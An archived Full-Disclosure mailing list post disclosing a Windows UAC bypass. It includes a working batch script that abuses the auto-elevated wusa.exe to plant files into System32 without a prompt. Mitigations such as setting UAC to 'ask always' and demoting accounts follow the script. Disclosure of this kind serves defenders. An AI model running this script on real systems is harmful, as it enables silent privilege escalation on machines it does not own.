lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <68C419F0DC0F414890BEDBA76D6B3EAA@W340>
Date: Sun, 15 Mar 2015 16:48:16 +0100
From: "Stefan Kanthak" <stefan.kanthak@...go.de>
To: <bugtraq@...urityfocus.com>
Cc: fulldisclosure@...lists.org
Subject: [FD] Defense in depth -- the Microsoft way (part 31): UAC is for
	binary planting

Hi @ll,

the exploit shown here should be well-known to every
Windows administrator, developer or QA engineer.

In Microsoft's own terms it doesn't qualify as security
vulnerability since UAC is a security feature, not a
security boundary.


Preconditions:

* a user running as "protected Administrator" on Windows 7
  and newer with standard UAC settings.

  JFTR: this is the default for "out-of-the-box" installations
        and typically almost never changed!

* some executables in directory %SystemRoot%\, but not in
  directory %SystemRoot%\System32\ (or %SystemRoot%\SysWoW64\);

  JFTR: REGEDIT.EXE is one of these executables, and it has a
        manifest which specifies
        <requestedExecutionLevel level="highestAvailable">,
        so users running as "protected Administrator" are
        accustomed to the UAC prompt when they start REGEDIT.EXE
        and will most probably acknowledge the privilege elevation.

  Exploit (to be run as a batch script):

  for %%! in ("%SystemRoot%\*.exe" "%SystemRoot%\*.dll") do call :PLANT "%%~nx!"
  exit /b
  :PLANT
  if exist "%SystemRoot%\System32\%~1" goto :EOF
  copy NUL: "%TEMP%\%~1"
  "%SystemRoot%\System32\makecab.exe" "%TEMP%\%~1" "%TEMP%\dummy.cab"
  "%SystemRoot%\System32\wusa.exe" "%TEMP%\dummy.cab" /extract:"%SystemRoot%\System32"
  if /I "%~x1" == ".exe" "%~1" /?


  WUSA.EXE is one of the about 70 Microsoft programs which are
  UAC-autoelevated since Windows 7, so the user doesn't need to
  answer the UAC prompt when the batch script plants a file in
  the directory "%SystemRoot%\System32\"


Mitigations:

* set the UAC control to "ask always" (as it was in Windows Vista)

* remove the user accounts created during setup from the
  "Administrators" group and place them in the "Users" group, i.e.
  demote these accounts from "Administrator" to "Standard user".

  Start->Run "control.exe userpasswords2" alias
  "rundll32.exe netplwiz.dll,UsersRunDll" allows this operation!

  JFTR: don't forget to enable the builtin "Administrator" account.

  Cf. <http://windows.microsoft.com/en-us/windows/user-accounts-faq>

| There are three types of accounts. Each type gives you a different
| level of control over the PC:
| * Administrator accounts provide the most control over a PC, and
|   should be used sparingly. You probably created this type of
|   account when you first started using your PC.
| * Standard accounts are for everyday use. If you're setting up
|   accounts for other people on your PC, it's a good idea to give
|   them standard accounts.


stay tuned
Stefan Kanthak

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ